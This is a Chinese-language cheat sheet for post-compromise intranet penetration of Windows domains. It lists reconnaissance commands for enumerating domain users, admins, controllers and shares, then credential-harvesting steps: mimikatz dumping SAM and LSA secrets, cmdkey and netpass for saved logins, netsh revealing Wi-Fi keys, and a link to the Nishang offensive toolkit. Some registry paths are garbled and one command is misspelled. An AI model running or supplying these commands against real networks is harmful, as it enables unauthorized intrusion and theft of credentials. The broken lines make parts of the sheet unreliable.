内网渗透梳理

信息收集命令：

query user || qwinsta 查看当前在线用户


net user  查看本机用户


net user /domain 查看域用户


net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多


net view /domain 查看有几个域


net view \\\\dc   查看 dc 域内共享文件


net group /domain 查看域里面的组


net group "domain admins" /domain 查看域管


net localgroup administrators /domain   /这个也是查域管，是升级为域控时，本地账户也成为域管


net group "domain controllers" /domain 域控


net time /domain 


net config workstation   当前登录域 - 计算机名 - 用户名


net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机，可访问资源


ipconfig


systeminfo


tasklist /svc


tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist


net localgroup administrators && whoami 查看当前是不是属于管理组


netstat -ano


nltest /dclist:xx  查看域控


whoami /all 查看 Mandatory Label uac 级别和 sid 号


net sessoin 查看远程连接 session (需要管理权限)


net share     共享目录


cmdkey /l   查看保存登陆凭证


echo %logonserver%  查看登陆域


spn –l administrator spn 记录


set  环境变量


dsquery server - 查找目录中的 AD DC/LDS 实例


dsquery user - 查找目录中的用户


dsquery computer 查询所有计算机名称 windows 2003


dir /s *.exe 查找指定目录下及子目录下没隐藏文件


arp -a


发现远程登录密码等密码 netpass.exe  下载地址：


https://www.nirsoft.net/utils/network_password_recovery.html
获取 window 密码：


mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit  
wifi 密码：


netsh wlan show profile 查处 wifi 名


netsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码
ie 代理


reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet 


Settings" /v ProxyServer


reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"
pac 代理


reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet 


Settings" /v AutoConfigURL   //引子 t0stmail
powershell-nishang


https://github.com/samratashok/nishang

参考文章
• https://www.0dayhack.com/post-523.html
• http://www.freebuf.com/articles/web/170970.html
• https://mp.weixin.qq.com/s/U2MqcjA_YmMlajJzvDCZZw